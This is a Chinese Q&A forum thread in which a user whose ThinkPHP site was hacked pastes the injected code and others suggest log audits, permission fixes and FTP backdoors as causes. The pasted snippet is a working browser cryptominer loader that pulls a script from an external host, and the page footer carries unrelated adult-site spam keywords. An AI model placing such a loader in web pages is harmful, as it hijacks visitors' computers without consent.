已解決430363個問題，去搜搜看，總會有你想問的

服務器又被入侵

首頁猿問服務器又被入侵

服務器又被入侵

PHP

牛魔王的故事 2019-03-07 05:02:11

使用 tp5.0 框架的入口文件被人寫入不知道啥玩意的東西求大佬!!! 阿里云服務器 wdlinux 系統 echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script> <script> var uri = 'www'; var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5}); if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) { jqueryui.start(); } </script>";

查看完整描述

11 回答

Cats萌萌

TA貢獻1805條經驗獲得超9個贊

先找一找是哪里出現的漏洞,注入?。∥募? 然后看一下文件的權限

反對回復 2019-03-18

慕沐林林

TA貢獻2016條經驗獲得超9個贊

先修改文件屬性，比如說把owner變成root:root

反對回復 2019-03-18

縹緲止盈

TA貢獻2041條經驗獲得超4個贊

先把日志摟出來審計一遍

反對回復 2019-03-18

慕斯王

TA貢獻1864條經驗獲得超2個贊

最近留意到幾次這樣的入侵
請問樓主服務器上是否安裝了 FTP ？
電腦上使用的 FTP 客戶端是？
我懷疑是 FTP 客戶端上的后門

反對回復 2019-03-18

江戶川亂折騰

TA貢獻1851條經驗獲得超5個贊

如果這代碼是入侵者留下的，可以告訴你，你的每一個用戶在幫他挖礦。

反對回復 2019-03-18

溫溫醬

TA貢獻1752條經驗獲得超4個贊

樓主，我的也中招了！
不是用TP的。
但是也是使用wdcp這個來搭的。
也是直接在我的程序入口處加了你貼出的那段代碼。
查也查不到頭緒。不知道是從哪里黑進來的。

反對回復 2019-03-18

斯蒂芬大帝

TA貢獻1827條經驗獲得超8個贊

你是是什么網站系統呀，用什么服務器呀，最近好多人都被入侵了呢。

反對回復 2019-03-18

11 回答
0 關注
611 瀏覽

關注

添加回答

舉報

0/150

提交

取消

亚洲在线久爱草,狠狠天天香蕉网,天天搞日日干久草,伊人亚洲日本欧美

熱搜

最近搜索清空

服務器又被入侵

服務器又被入侵

11 回答

添加回答